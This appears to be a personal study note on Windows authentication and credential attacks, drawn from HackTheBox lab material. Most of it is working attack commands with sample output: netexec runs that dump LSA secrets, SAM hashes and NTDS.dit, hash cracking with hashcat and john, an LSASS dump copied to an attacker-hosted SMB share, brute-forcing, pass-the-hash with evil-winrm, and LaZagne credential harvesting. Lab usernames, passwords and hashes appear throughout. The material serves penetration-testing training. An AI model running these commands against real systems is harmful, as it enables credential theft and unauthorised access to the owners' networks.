Windows Authentcation

Windows Authentication Process

The Windows client authentication process consists of many different modules that perform the entire logon, retrieval, and verification processes. In addition, there are many different and complex authentication procedures on the Windows system, such as Kerberos authentication. The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer. In addition, the LSA maintains information about all aspects of local security on a computer. It also provides various services for translating between names and security IDs (SIDs).

Source: HackTheBox

Local interactive logon is performed by the interaction between the logon process (WinLogon), the logon user interface process (LogonUI), the credential providers, LSASS, one or more authentication packages, and SAM or Active Directory.

Winlogon is a trusted process responsible for managing security-related user interactions. These include:

• Launching LogonUI to enter passwords at login
• Changing passwords
• Locking and unlocking the workstation

Attacking SAM

The Security Accounts Manager (SAM) is a database file in Windows operating systems that stores users’ passwords. It can be found in the C:\Windows\System32\config directory. The SAM file is encrypted using a locally stored key. The key is stored in the registry at HKEY_LOCAL_MACHINE\Security\SAM\Domains\Account.

Dumping LSA Secrets Remotely

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
 
SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB         10.129.42.198   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached
 

Dumping SAM Database remotely

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
 
SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Cracking Hashes

We can crack NTLM hashes using both hashcat and john. Below are examples for each tool:

• Using hashcat:

  hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

• Using john:

  john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Dumping and Attacking LSASS

To dump the LSASS process, use Task Manager:

The dump file will be saved in the following location:

C:\Users\<loggedonuser>\AppData\Local\Temp

Transferring Files through Shares

1. Create a share folder named CompData:

   impacket-smbserver -smb2support CompData /home/huy/Documents/

2. Move the LSASS dump to the share folder:

   move C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP \\10.10.16.19\CompData

To extract credentials from the dump, use pypykatz:

pypykatz lsa minidump /home/huy/Documents/lsass.dmp

Attacking Active Directory & NTDS.dit

Active Directory (AD) is widely used in enterprise networks. Understanding how to attack AD environments is essential since many organizations use it to manage Windows systems.

Creating a Custom List of Usernames or Passwords

If you collect names from a website:

• Ben Williamson
• Bob Burgerstein
• Jim Stevenson

You can generate username and password lists as follows:

# Generate usernames
./username-anarchy -i /home/ltnbob/names.txt
 
# Generate passwords
hashcat --force pass.list -r custom.rule --stdout | sort -u > mut_pass.list

Brute-Forcing Active Directory

• Brute-force AD with netexec:

  netexec smb 10.129.201.57 -u bob -p /usr/share/wordlists/rockyou.txt

• Brute-force AD with msfconsole:

  msf6 > use auxiliary/scanner/smb/smb_login
  ...
  msf6 auxiliary(scanner/smb/smb_login) > exploit

To capture the NTDS.dit file:

netexec smb 10.129.201.57 -u bob -p password --ntds

If Hash Cracking Fails, Use Pass-the-Hash:

evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"

Credential Hunting in Windows

Use LaZagne to extract credentials:

# Extract all credentials
lazagne.exe all
 
# Extract from specific modules
lazagne.exe browsers

Additionally, use findstr to search for passwords in files:

C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml